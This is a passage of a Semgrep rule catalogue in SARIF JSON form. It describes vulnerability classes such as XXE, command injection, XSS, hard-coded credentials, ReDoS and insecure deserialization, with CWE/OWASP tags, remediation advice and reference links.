Reducing dependencies on external resources is also a good practice for performance reasons. It is difficult to guarantee that even a trusted XML file on your server or during transmission has not been tampered with by a malicious third-party. For more information, see: [Java XXE prevention](https://semgrep.dev/docs/cheat-sheets/java-xxe/)"},"helpUri":"https://semgrep.dev/r/kotlin.xxe.documentbuilderfactory-xxe.documentbuilderfactory-xxe","id":"kotlin.xxe.documentbuilderfactory-xxe.documentbuilderfactory-xxe","name":"kotlin.xxe.documentbuilderfactory-xxe.documentbuilderfactory-xxe","properties":{"precision":"very-high","tags":["CWE-776: Improper Restriction of Recursive Entity References in DTDs ('XML Entity Expansion')","MEDIUM CONFIDENCE","OWASP-A04:2017 - XML External Entities (XXE)","OWASP-A05:2021 - Security Misconfiguration","security"]},"shortDescription":{"text":"Semgrep Finding: kotlin.xxe.documentbuilderfactory-xxe.documentbuilderfactory-xxe"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"MemoryMarshal.CreateSpan and MemoryMarshal.CreateReadOnlySpan should be used with caution, as the length argument is not checked."},"help":{"markdown":"MemoryMarshal.CreateSpan and MemoryMarshal.CreateReadOnlySpan should be used with caution, as the length argument is not checked.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/csharp.lang.security.memory.memory-marshal-create-span.memory-marshal-create-span)\n - [https://docs.microsoft.com/en-us/dotnet/api/system.runtime.interopservices.memorymarshal.createspan?view=net-6.0](https://docs.microsoft.com/en-us/dotnet/api/system.runtime.interopservices.memorymarshal.createspan?view=net-6.0)\n - [https://docs.microsoft.com/en-us/dotnet/api/system.runtime.interopservices.memorymarshal.createreadonlyspan?view=net-6.0](https://docs.microsoft.com/en-us/dotnet/api/system.runtime.interopservices.memorymarshal.createreadonlyspan?view=net-6.0)\n","text":"MemoryMarshal.CreateSpan and MemoryMarshal.CreateReadOnlySpan should be used with caution, as the length argument is not checked."},"helpUri":"https://semgrep.dev/r/csharp.lang.security.memory.memory-marshal-create-span.memory-marshal-create-span","id":"csharp.lang.security.memory.memory-marshal-create-span.memory-marshal-create-span","name":"csharp.lang.security.memory.memory-marshal-create-span.memory-marshal-create-span","properties":{"precision":"very-high","tags":["CWE-125: Out-of-bounds Read","LOW CONFIDENCE","OWASP-A04:2021 - Insecure Design","security"]},"shortDescription":{"text":"Semgrep Finding: csharp.lang.security.memory.memory-marshal-create-span.memory-marshal-create-span"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"The application uses an empty credential. This can lead to unauthorized access by either an internal or external malicious actor. It is recommended to rotate the secret and retrieve them from a secure secret vault or Hardware Security Module (HSM), alternatively environment variables can be used if allowed by your company policy."},"help":{"markdown":"The application uses an empty credential. This can lead to unauthorized access by either an internal or external malicious actor. It is recommended to rotate the secret and retrieve them from a secure secret vault or Hardware Security Module (HSM), alternatively environment variables can be used if allowed by your company policy.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/rust.secrets.postgres.hardcoded-connection-empty-password.hardcoded-connection-empty-password)\n - [https://docs.rs/postgres/latest/postgres/](https://docs.rs/postgres/latest/postgres/)\n - [https://owasp.org/Top10/A07_2021-Identification_and_Authentication_Failures](https://owasp.org/Top10/A07_2021-Identification_and_Authentication_Failures)\n","text":"The application uses an empty credential. This can lead to unauthorized access by either an internal or external malicious actor. It is recommended to rotate the secret and retrieve them from a secure secret vault or Hardware Security Module (HSM), alternatively environment variables can be used if allowed by your company policy."},"helpUri":"https://semgrep.dev/r/rust.secrets.postgres.hardcoded-connection-empty-password.hardcoded-connection-empty-password","id":"rust.secrets.postgres.hardcoded-connection-empty-password.hardcoded-connection-empty-password","name":"rust.secrets.postgres.hardcoded-connection-empty-password.hardcoded-connection-empty-password","properties":{"precision":"very-high","tags":["CWE-287: Improper Authentication","HIGH CONFIDENCE","OWASP-A02:2017 - Broken Authentication","OWASP-A07:2021 - Identification and Authentication Failures","security"]},"shortDescription":{"text":"Semgrep Finding: rust.secrets.postgres.hardcoded-connection-empty-password.hardcoded-connection-empty-password"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"Untrusted input might be injected into a command executed by the application, which can lead to a command injection vulnerability. An attacker can execute arbitrary commands, potentially gaining complete control of the system. To prevent this vulnerability, avoid executing OS commands with user input. If this is unavoidable, validate and sanitize the input, and use safe methods for executing the commands."},"help":{"markdown":"Untrusted input might be injected into a command executed by the application, which can lead to a command injection vulnerability. An attacker can execute arbitrary commands, potentially gaining complete control of the system. To prevent this vulnerability, avoid executing OS commands with user input. If this is unavoidable, validate and sanitize the input, and use safe methods for executing the commands.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.cherrypy.os.tainted-os-command-stdlib-cherrypy.tainted-os-command-stdlib-cherrypy)\n - [https://docs.cherrypy.dev/en/latest/tutorials.html](https://docs.cherrypy.dev/en/latest/tutorials.html)\n - [https://docs.python.org/3/library/os.html](https://docs.python.org/3/library/os.html)\n - [https://docs.python.org/3/library/subprocess.html#subprocess.Popen](https://docs.python.org/3/library/subprocess.html#subprocess.Popen)\n - [https://owasp.org/Top10/A03_2021-Injection](https://owasp.org/Top10/A03_2021-Injection)\n - [https://semgrep.dev/docs/cheat-sheets/python-command-injection/](https://semgrep.dev/docs/cheat-sheets/python-command-injection/)\n - [https://stackless.readthedocs.io/en/v2.7.16-slp/library/commands.html](https://stackless.readthedocs.io/en/v2.7.16-slp/library/commands.html)\n","text":"Untrusted input might be injected into a command executed by the application, which can lead to a command injection vulnerability. An attacker can execute arbitrary commands, potentially gaining complete control of the system. To prevent this vulnerability, avoid executing OS commands with user input. If this is unavoidable, validate and sanitize the input, and use safe methods for executing the commands."},"helpUri":"https://semgrep.dev/r/python.cherrypy.os.tainted-os-command-stdlib-cherrypy.tainted-os-command-stdlib-cherrypy","id":"python.cherrypy.os.tainted-os-command-stdlib-cherrypy.tainted-os-command-stdlib-cherrypy","name":"python.cherrypy.os.tainted-os-command-stdlib-cherrypy.tainted-os-command-stdlib-cherrypy","properties":{"precision":"very-high","tags":["CWE-78: Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')","HIGH CONFIDENCE","OWASP-A01:2017 - Injection","OWASP-A03:2021 - Injection","security"]},"shortDescription":{"text":"Semgrep Finding: python.cherrypy.os.tainted-os-command-stdlib-cherrypy.tainted-os-command-stdlib-cherrypy"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Detected a template variable used in a script tag. Although template variables are HTML escaped, HTML escaping does not always prevent cross-site scripting (XSS) attacks when used directly in JavaScript. If you need to do this, use `escape_javascript` or its alias, `j`. However, this will not protect from XSS in all circumstances; see the references for more information. Consider placing this value in the HTML portion (outside of a script tag)."},"help":{"markdown":"Detected a template variable used in a script tag. Although template variables are HTML escaped, HTML escaping does not always prevent cross-site scripting (XSS) attacks when used directly in JavaScript. If you need to do this, use `escape_javascript` or its alias, `j`. However, this will not protect from XSS in all circumstances; see the references for more information. Consider placing this value in the HTML portion (outside of a script tag).\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/ruby.rails.security.audit.xss.templates.var-in-script-tag.var-in-script-tag)\n - [https://www.netsparker.com/blog/web-security/preventing-xss-ruby-on-rails-web-applications/](https://www.netsparker.com/blog/web-security/preventing-xss-ruby-on-rails-web-applications/)\n - [https://www.youtube.com/watch?v=yYTkLUEdIyE](https://www.youtube.com/watch?v=yYTkLUEdIyE)\n - [https://www.veracode.com/blog/secure-development/nodejs-template-engines-why-default-encoders-are-not-enough](https://www.veracode.com/blog/secure-development/nodejs-template-engines-why-default-encoders-are-not-enough)\n","text":"Detected a template variable used in a script tag. Although template variables are HTML escaped, HTML escaping does not always prevent cross-site scripting (XSS) attacks when used directly in JavaScript. If you need to do this, use `escape_javascript` or its alias, `j`. However, this will not protect from XSS in all circumstances; see the references for more information. Consider placing this value in the HTML portion (outside of a script tag)."},"helpUri":"https://semgrep.dev/r/ruby.rails.security.audit.xss.templates.var-in-script-tag.var-in-script-tag","id":"ruby.rails.security.audit.xss.templates.var-in-script-tag.var-in-script-tag","name":"ruby.rails.security.audit.xss.templates.var-in-script-tag.var-in-script-tag","properties":{"precision":"very-high","tags":["CWE-79: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')","LOW CONFIDENCE","OWASP-A03:2021 - Injection","OWASP-A07:2017 - Cross-Site Scripting (XSS)","security"]},"shortDescription":{"text":"Semgrep Finding: ruby.rails.security.audit.xss.templates.var-in-script-tag.var-in-script-tag"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"OWASP guidance recommends disabling tracing for production applications to prevent accidental leakage of sensitive application information."},"help":{"markdown":"OWASP guidance recommends disabling tracing for production applications to prevent accidental leakage of sensitive application information.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/csharp.dotnet.security.net-webconfig-trace-enabled.net-webconfig-trace-enabled)\n - [https://cheatsheetseries.owasp.org/cheatsheets/DotNet_Security_Cheat_Sheet.html#asp-net-web-forms-guidance](https://cheatsheetseries.owasp.org/cheatsheets/DotNet_Security_Cheat_Sheet.html#asp-net-web-forms-guidance)\n - [https://msdn.microsoft.com/en-us/library/e8z01xdh.aspx](https://msdn.microsoft.com/en-us/library/e8z01xdh.aspx)\n","text":"OWASP guidance recommends disabling tracing for production applications to prevent accidental leakage of sensitive application information."},"helpUri":"https://semgrep.dev/r/csharp.dotnet.security.net-webconfig-trace-enabled.net-webconfig-trace-enabled","id":"csharp.dotnet.security.net-webconfig-trace-enabled.net-webconfig-trace-enabled","name":"csharp.dotnet.security.net-webconfig-trace-enabled.net-webconfig-trace-enabled","properties":{"precision":"very-high","tags":["CWE-1323: Improper Management of Sensitive Trace Data","LOW CONFIDENCE","OWASP-A05:2021 - Security Misconfiguration","security"]},"shortDescription":{"text":"Semgrep Finding: csharp.dotnet.security.net-webconfig-trace-enabled.net-webconfig-trace-enabled"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Detected user input flowing into an HTML response. You may be accidentally bypassing secure methods of rendering HTML by manually constructing HTML and this could create a cross-site scripting vulnerability, which could let attackers steal sensitive user data."},"help":{"markdown":"Detected user input flowing into an HTML response. You may be accidentally bypassing secure methods of rendering HTML by manually constructing HTML and this could create a cross-site scripting vulnerability, which could let attackers steal sensitive user data.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.aws-lambda.security.tainted-html-response.tainted-html-response)\n - [https://owasp.org/Top10/A03_2021-Injection](https://owasp.org/Top10/A03_2021-Injection)\n","text":"Detected user input flowing into an HTML response. You may be accidentally bypassing secure methods of rendering HTML by manually constructing HTML and this could create a cross-site scripting vulnerability, which could let attackers steal sensitive user data."},"helpUri":"https://semgrep.dev/r/python.aws-lambda.security.tainted-html-response.tainted-html-response","id":"python.aws-lambda.security.tainted-html-response.tainted-html-response","name":"python.aws-lambda.security.tainted-html-response.tainted-html-response","properties":{"precision":"very-high","tags":["CWE-79: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')","MEDIUM CONFIDENCE","OWASP-A03:2021 - Injection","OWASP-A07:2017 - Cross-Site Scripting (XSS)","security"]},"shortDescription":{"text":"Semgrep Finding: python.aws-lambda.security.tainted-html-response.tainted-html-response"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"Heroku API Key detected"},"help":{"markdown":"Heroku API Key detected\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/generic.secrets.security.detected-heroku-api-key.detected-heroku-api-key)\n - [https://owasp.org/Top10/A07_2021-Identification_and_Authentication_Failures](https://owasp.org/Top10/A07_2021-Identification_and_Authentication_Failures)\n","text":"Heroku API Key detected"},"helpUri":"https://semgrep.dev/r/generic.secrets.security.detected-heroku-api-key.detected-heroku-api-key","id":"generic.secrets.security.detected-heroku-api-key.detected-heroku-api-key","name":"generic.secrets.security.detected-heroku-api-key.detected-heroku-api-key","properties":{"precision":"very-high","tags":["CWE-798: Use of Hard-coded Credentials","LOW CONFIDENCE","OWASP-A07:2021 - Identification and Authentication Failures","security"]},"shortDescription":{"text":"Semgrep Finding: generic.secrets.security.detected-heroku-api-key.detected-heroku-api-key"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"The application uses an empty credential. This can lead to unauthorized access by either an internal or external malicious actor. It is recommended to rotate the secret and retrieve them from a secure secret vault or Hardware Security Module (HSM), alternatively environment variables can be used if allowed by your company policy."},"help":{"markdown":"The application uses an empty credential. This can lead to unauthorized access by either an internal or external malicious actor. It is recommended to rotate the secret and retrieve them from a secure secret vault or Hardware Security Module (HSM), alternatively environment variables can be used if allowed by your company policy.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/kotlin.sql.drivermanager-hardcoded-empty-secret.drivermanager-hardcoded-empty-secret)\n - [https://owasp.org/Top10/A07_2021-Identification_and_Authentication_Failures](https://owasp.org/Top10/A07_2021-Identification_and_Authentication_Failures)\n","text":"The application uses an empty credential. This can lead to unauthorized access by either an internal or external malicious actor. It is recommended to rotate the secret and retrieve them from a secure secret vault or Hardware Security Module (HSM), alternatively environment variables can be used if allowed by your company policy."},"helpUri":"https://semgrep.dev/r/kotlin.sql.drivermanager-hardcoded-empty-secret.drivermanager-hardcoded-empty-secret","id":"kotlin.sql.drivermanager-hardcoded-empty-secret.drivermanager-hardcoded-empty-secret","name":"kotlin.sql.drivermanager-hardcoded-empty-secret.drivermanager-hardcoded-empty-secret","properties":{"precision":"very-high","tags":["CWE-287: Improper Authentication","HIGH CONFIDENCE","OWASP-A02:2017 - Broken Authentication","OWASP-A07:2021 - Identification and Authentication Failures","security"]},"shortDescription":{"text":"Semgrep Finding: kotlin.sql.drivermanager-hardcoded-empty-secret.drivermanager-hardcoded-empty-secret"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"A secret is hard-coded in the application. Secrets stored in source code, such as credentials, identifiers, and other types of sensitive data, can be leaked and used by internal or external malicious actors. It is recommended to rotate the secret and retrieve them from a secure secret vault or Hardware Security Module (HSM), alternatively environment variables can be used if allowed by your company policy."},"help":{"markdown":"A secret is hard-coded in the application. Secrets stored in source code, such as credentials, identifiers, and other types of sensitive data, can be leaked and used by internal or external malicious actors. It is recommended to rotate the secret and retrieve them from a secure secret vault or Hardware Security Module (HSM), alternatively environment variables can be used if allowed by your company policy.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/kotlin.mongo.mongo-hardcoded-secret.mongo-hardcoded-secret)\n - [https://owasp.org/Top10/A07_2021-Identification_and_Authentication_Failures](https://owasp.org/Top10/A07_2021-Identification_and_Authentication_Failures)\n","text":"A secret is hard-coded in the application. Secrets stored in source code, such as credentials, identifiers, and other types of sensitive data, can be leaked and used by internal or external malicious actors. It is recommended to rotate the secret and retrieve them from a secure secret vault or Hardware Security Module (HSM), alternatively environment variables can be used if allowed by your company policy."},"helpUri":"https://semgrep.dev/r/kotlin.mongo.mongo-hardcoded-secret.mongo-hardcoded-secret","id":"kotlin.mongo.mongo-hardcoded-secret.mongo-hardcoded-secret","name":"kotlin.mongo.mongo-hardcoded-secret.mongo-hardcoded-secret","properties":{"precision":"very-high","tags":["CWE-798: Use of Hard-coded Credentials","HIGH CONFIDENCE","OWASP-A07:2021 - Identification and Authentication Failures","security"]},"shortDescription":{"text":"Semgrep Finding: kotlin.mongo.mongo-hardcoded-secret.mongo-hardcoded-secret"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"When using `System.Text.RegularExpressions` to process untrusted input, pass a timeout. A malicious user can provide input to `RegularExpressions` that abuses the backtracking behaviour of this regular expression engine. This will lead to excessive CPU usage, causing a Denial-of-Service attack"},"help":{"markdown":"When using `System.Text.RegularExpressions` to process untrusted input, pass a timeout. A malicious user can provide input to `RegularExpressions` that abuses the backtracking behaviour of this regular expression engine. This will lead to excessive CPU usage, causing a Denial-of-Service attack\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/csharp.lang.security.regular-expression-dos.regular-expression-dos.regular-expression-dos)\n - [https://owasp.org/www-community/attacks/Regular_expression_Denial_of_Service_-_ReDoS](https://owasp.org/www-community/attacks/Regular_expression_Denial_of_Service_-_ReDoS)\n - [https://docs.microsoft.com/en-us/dotnet/standard/base-types/regular-expressions#regular-expression-examples](https://docs.microsoft.com/en-us/dotnet/standard/base-types/regular-expressions#regular-expression-examples)\n","text":"When using `System.Text.RegularExpressions` to process untrusted input, pass a timeout. A malicious user can provide input to `RegularExpressions` that abuses the backtracking behaviour of this regular expression engine. This will lead to excessive CPU usage, causing a Denial-of-Service attack"},"helpUri":"https://semgrep.dev/r/csharp.lang.security.regular-expression-dos.regular-expression-dos.regular-expression-dos","id":"csharp.lang.security.regular-expression-dos.regular-expression-dos.regular-expression-dos","name":"csharp.lang.security.regular-expression-dos.regular-expression-dos.regular-expression-dos","properties":{"precision":"very-high","tags":["CWE-1333: Inefficient Regular Expression Complexity","MEDIUM CONFIDENCE","OWASP-A01:2017 - Injection","security"]},"shortDescription":{"text":"Semgrep Finding: csharp.lang.security.regular-expression-dos.regular-expression-dos.regular-expression-dos"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"The application might dynamically evaluate untrusted input, which can lead to a code injection vulnerability. An attacker can execute arbitrary code, potentially gaining complete control of the system. To prevent this vulnerability, avoid executing code containing user input. If this is unavoidable, validate and sanitize the input, and use safe alternatives for evaluating user input."},"help":{"markdown":"The application might dynamically evaluate untrusted input, which can lead to a code injection vulnerability. An attacker can execute arbitrary code, potentially gaining complete control of the system. To prevent this vulnerability, avoid executing code containing user input. If this is unavoidable, validate and sanitize the input, and use safe alternatives for evaluating user input.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/javascript.express.code.vm2-express.vm2-express)\n - [https://owasp.org/Top10/A03_2021-Injection](https://owasp.org/Top10/A03_2021-Injection)\n","text":"The application might dynamically evaluate untrusted input, which can lead to a code injection vulnerability. An attacker can execute arbitrary code, potentially gaining complete control of the system. To prevent this vulnerability, avoid executing code containing user input. If this is unavoidable, validate and sanitize the input, and use safe alternatives for evaluating user input."},"helpUri":"https://semgrep.dev/r/javascript.express.code.vm2-express.vm2-express","id":"javascript.express.code.vm2-express.vm2-express","name":"javascript.express.code.vm2-express.vm2-express","properties":{"precision":"very-high","tags":["CWE-94: Improper Control of Generation of Code ('Code Injection')","HIGH CONFIDENCE","OWASP-A03:2021 - Injection","security"]},"shortDescription":{"text":"Semgrep Finding: javascript.express.code.vm2-express.vm2-express"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Service '$SERVICE' is running in privileged mode. This grants the container the equivalent of root capabilities on the host machine. This can lead to container escapes, privilege escalation, and other security concerns. Remove the 'privileged' key to disable this capability."},"help":{"markdown":"Service '$SERVICE' is running in privileged mode. This grants the container the equivalent of root capabilities on the host machine. This can lead to container escapes, privilege escalation, and other security concerns. Remove the 'privileged' key to disable this capability.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/yaml.docker-compose.security.privileged-service.privileged-service)\n - [https://www.trendmicro.com/en_us/research/19/l/why-running-a-privileged-container-in-docker-is-a-bad-idea.html](https://www.trendmicro.com/en_us/research/19/l/why-running-a-privileged-container-in-docker-is-a-bad-idea.html)\n - [https://containerjournal.com/topics/container-security/why-running-a-privileged-container-is-not-a-good-idea/](https://containerjournal.com/topics/container-security/why-running-a-privileged-container-is-not-a-good-idea/)\n","text":"Service '$SERVICE' is running in privileged mode. This grants the container the equivalent of root capabilities on the host machine. This can lead to container escapes, privilege escalation, and other security concerns. Remove the 'privileged' key to disable this capability."},"helpUri":"https://semgrep.dev/r/yaml.docker-compose.security.privileged-service.privileged-service","id":"yaml.docker-compose.security.privileged-service.privileged-service","name":"yaml.docker-compose.security.privileged-service.privileged-service","properties":{"precision":"very-high","tags":["CWE-250: Execution with Unnecessary Privileges","HIGH CONFIDENCE","OWASP-A05:2021 - Security Misconfiguration","OWASP-A06:2017 - Security Misconfiguration","security"]},"shortDescription":{"text":"Semgrep Finding: yaml.docker-compose.security.privileged-service.privileged-service"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Hardcoded salt is used in cryptographic operations, which can result in major security issues. Use salt generator that is provided by bcrypt - `bcrypt.gensalt()`."},"help":{"markdown":"Hardcoded salt is used in cryptographic operations, which can result in major security issues. Use salt generator that is provided by bcrypt - `bcrypt.gensalt()`.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.bcrypt.bcrypt-hardcoded-salt.bcrypt-hardcoded-salt)\n - [https://cryptography.io/en/latest/random-numbers/#random-number-generation](https://cryptography.io/en/latest/random-numbers/#random-number-generation)\n - [https://owasp.org/Top10/A02_2021-Cryptographic_Failures](https://owasp.org/Top10/A02_2021-Cryptographic_Failures)\n","text":"Hardcoded salt is used in cryptographic operations, which can result in major security issues. Use salt generator that is provided by bcrypt - `bcrypt.gensalt()`."},"helpUri":"https://semgrep.dev/r/python.bcrypt.bcrypt-hardcoded-salt.bcrypt-hardcoded-salt","id":"python.bcrypt.bcrypt-hardcoded-salt.bcrypt-hardcoded-salt","name":"python.bcrypt.bcrypt-hardcoded-salt.bcrypt-hardcoded-salt","properties":{"precision":"very-high","tags":["CWE-327: Use of a Broken or Risky Cryptographic Algorithm","HIGH CONFIDENCE","OWASP-A02:2021 - Cryptographic Failures","OWASP-A03:2017 - Sensitive Data Exposure","security"]},"shortDescription":{"text":"Semgrep Finding: python.bcrypt.bcrypt-hardcoded-salt.bcrypt-hardcoded-salt"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"The application uses an empty credential. This can lead to unauthorized access by either an internal or external malicious actor. It is recommended to rotate the secret and retrieve them from a secure secret vault or Hardware Security Module (HSM), alternatively environment variables can be used if allowed by your company policy."},"help":{"markdown":"The application uses an empty credential. This can lead to unauthorized access by either an internal or external malicious actor. It is recommended to rotate the secret and retrieve them from a secure secret vault or Hardware Security Module (HSM), alternatively environment variables can be used if allowed by your company policy.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/kotlin.sql.jetbrains-hardcoded-empty-secret.jetbrains-hardcoded-empty-secret)\n - [https://owasp.org/Top10/A07_2021-Identification_and_Authentication_Failures](https://owasp.org/Top10/A07_2021-Identification_and_Authentication_Failures)\n","text":"The application uses an empty credential. This can lead to unauthorized access by either an internal or external malicious actor. It is recommended to rotate the secret and retrieve them from a secure secret vault or Hardware Security Module (HSM), alternatively environment variables can be used if allowed by your company policy."},"helpUri":"https://semgrep.dev/r/kotlin.sql.jetbrains-hardcoded-empty-secret.jetbrains-hardcoded-empty-secret","id":"kotlin.sql.jetbrains-hardcoded-empty-secret.jetbrains-hardcoded-empty-secret","name":"kotlin.sql.jetbrains-hardcoded-empty-secret.jetbrains-hardcoded-empty-secret","properties":{"precision":"very-high","tags":["CWE-287: Improper Authentication","HIGH CONFIDENCE","OWASP-A02:2017 - Broken Authentication","OWASP-A07:2021 - Identification and Authentication Failures","security"]},"shortDescription":{"text":"Semgrep Finding: kotlin.sql.jetbrains-hardcoded-empty-secret.jetbrains-hardcoded-empty-secret"}},{"defaultConfiguration":{"level":"note"},"fullDescription":{"text":"Detected a cookie options with the `SameSite` flag set to \"None\". This is a potential security risk that arises from the way web browsers manage cookies. In a typical web application, cookies are used to store and transmit session-related data between a client and a server. To enhance security, cookies can be marked with the \"SameSite\" attribute, which restricts their usage based on the origin of the page that set them. This attribute can have three values: \"Strict,\" \"Lax,\" or \"None\". Make sure the `SameSite` attribute of the important cookies (e.g., session cookie) is set to a reasonable value. When `SameSite` is set to \"Strict\", no 3rd party cookie will be sent with outgoing requests, this is the most secure and private setting but harder to deploy with good usability. Setting it to \"Lax\" is the minimum requirement."},"help":{"markdown":"Detected a cookie options with the `SameSite` flag set to \"None\". This is a potential security risk that arises from the way web browsers manage cookies. In a typical web application, cookies are used to store and transmit session-related data between a client and a server. To enhance security, cookies can be marked with the \"SameSite\" attribute, which restricts their usage based on the origin of the page that set them. This attribute can have three values: \"Strict,\" \"Lax,\" or \"None\". Make sure the `SameSite` attribute of the important cookies (e.g., session cookie) is set to a reasonable value. When `SameSite` is set to \"Strict\", no 3rd party cookie will be sent with outgoing requests, this is the most secure and private setting but harder to deploy with good usability. Setting it to \"Lax\" is the minimum requirement.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.django.web.django-cookie-samesite-none.django-cookie-samesite-none)\n - [https://owasp.org/Top10/A01_2021-Broken_Access_Control](https://owasp.org/Top10/A01_2021-Broken_Access_Control)\n - [https://web.dev/articles/samesite-cookies-explained](https://web.dev/articles/samesite-cookies-explained)\n","text":"Detected a cookie options with the `SameSite` flag set to \"None\". This is a potential security risk that arises from the way web browsers manage cookies. In a typical web application, cookies are used to store and transmit session-related data between a client and a server. To enhance security, cookies can be marked with the \"SameSite\" attribute, which restricts their usage based on the origin of the page that set them. This attribute can have three values: \"Strict,\" \"Lax,\" or \"None\". Make sure the `SameSite` attribute of the important cookies (e.g., session cookie) is set to a reasonable value. When `SameSite` is set to \"Strict\", no 3rd party cookie will be sent with outgoing requests, this is the most secure and private setting but harder to deploy with good usability. Setting it to \"Lax\" is the minimum requirement."},"helpUri":"https://semgrep.dev/r/python.django.web.django-cookie-samesite-none.django-cookie-samesite-none","id":"python.django.web.django-cookie-samesite-none.django-cookie-samesite-none","name":"python.django.web.django-cookie-samesite-none.django-cookie-samesite-none","properties":{"precision":"very-high","tags":["CWE-1275: Sensitive Cookie with Improper SameSite Attribute","HIGH CONFIDENCE","OWASP-A01:2021 - Broken Access Control","security"]},"shortDescription":{"text":"Semgrep Finding: python.django.web.django-cookie-samesite-none.django-cookie-samesite-none"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Depending on the context, user control data in `Object.assign` can cause web response to include data that it should not have or can lead to a mass assignment vulnerability."},"help":{"markdown":"Depending on the context, user control data in `Object.assign` can cause web response to include data that it should not have or can lead to a mass assignment vulnerability.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/javascript.lang.security.insecure-object-assign.insecure-object-assign)\n - [https://cheatsheetseries.owasp.org/cheatsheets/Mass_Assignment_Cheat_Sheet.html](https://cheatsheetseries.owasp.org/cheatsheets/Mass_Assignment_Cheat_Sheet.html)\n - [https://en.wikipedia.org/wiki/Mass_assignment_vulnerability](https://en.wikipedia.org/wiki/Mass_assignment_vulnerability)\n","text":"Depending on the context, user control data in `Object.assign` can cause web response to include data that it should not have or can lead to a mass assignment vulnerability."},"helpUri":"https://semgrep.dev/r/javascript.lang.security.insecure-object-assign.insecure-object-assign","id":"javascript.lang.security.insecure-object-assign.insecure-object-assign","name":"javascript.lang.security.insecure-object-assign.insecure-object-assign","properties":{"precision":"very-high","tags":["CWE-601: URL Redirection to Untrusted Site ('Open Redirect')","LOW CONFIDENCE","OWASP-A01:2021 - Broken Access Control","security"]},"shortDescription":{"text":"Semgrep Finding: javascript.lang.security.insecure-object-assign.insecure-object-assign"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"The application may convert user-controlled data into an object, which can lead to an insecure deserialization vulnerability. An attacker can create a malicious serialized object, pass it to the application, and take advantage of the deserialization process to perform Denial-of-service (DoS), Remote code execution (RCE), or bypass access control measures. To prevent this vulnerability, leverage data formats such as JSON or XML as safer alternatives. If you need to deserialize user input in a specific format, consider digitally signing the data before serialization to prevent tampering. For more information, see: [Deserialization prevention](https://cheatsheetseries.owasp.org/cheatsheets/Deserialization_Cheat_Sheet.html) Even for a data-only serialization format such as JSON, a malicious string may cause the decoder to consume considerable CPU and memory resources. Limiting the size of data to be parsed is recommended."},"help":{"markdown":"The application may convert user-controlled data into an object, which can lead to an insecure deserialization vulnerability. An attacker can create a malicious serialized object, pass it to the application, and take advantage of the deserialization process to perform Denial-of-service (DoS), Remote code execution (RCE), or bypass access control measures. To prevent this vulnerability, leverage data formats such as JSON or XML as safer alternatives. If you need to deserialize user input in a specific format, consider digitally signing the data before serialization to prevent tampering. For more information, see: [Deserialization prevention](https://cheatsheetseries.owasp.org/cheatsheets/Deserialization_Cheat_Sheet.html) Even for a data-only serialization format such as JSON, a malicious string may cause the decoder to consume considerable CPU and memory resources. Limiting the size of data to be parsed is recommended.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.pyramid.deserialization.tainted-json-pyramid.tainted-json-pyramid)\n - [https://portswigger.net/web-security/deserialization](https://portswigger.net/web-security/deserialization)\n - [https://knowledge-base.secureflag.com/vulnerabilities/unsafe_deserialization/unsafe_deserialization_python.html](https://knowledge-base.secureflag.com/vulnerabilities/unsafe_deserialization/unsafe_deserialization_python.html)\n - [https://docs.python.org/3/library/json.html](https://docs.python.org/3/library/json.html)\n - [https://docs.python.org/3/library/pickle.html](https://docs.python.org/3/library/pickle.html)\n - [https://davidhamann.de/2020/04/05/exploiting-python-pickle/](https://davidhamann.de/2020/04/05/exploiting-python-pickle/)\n","text":"The application may convert user-controlled data into an object, which can lead to an insecure deserialization vulnerability. An attacker can create a malicious serialized object, pass it to the application, and take advantage of the deserialization process to perform Denial-of-service (DoS), Remote code execution (RCE), or bypass access control measures. To prevent this vulnerability, leverage data formats such as JSON or XML as safer alternatives. If you need to deserialize user input in a specific format, consider digitally signing the data before serialization to prevent tampering. For more information, see: [Deserialization prevention](https://cheatsheetseries.owasp.org/cheatsheets/Deserialization_Cheat_Sheet.html) Even for a data-only serialization format such as JSON, a malicious string may cause the decoder to consume considerable CPU and memory resources. Limiting the size of data to be parsed is recommended."},"helpUri":"https://semgrep.dev/r/python.pyramid.deserialization.tainted-json-pyramid.tainted-json-pyramid","id":"python.pyramid.deserialization.tainted-json-pyramid.tainted-json-pyramid","name":"python.pyramid.deserialization.tainted-json-pyramid.tainted-json-pyramid","properties":{"precision":"very-high","tags":["CWE-502: Deserialization of Untrusted Data","HIGH CONFIDENCE","OWASP-A08:2017 - 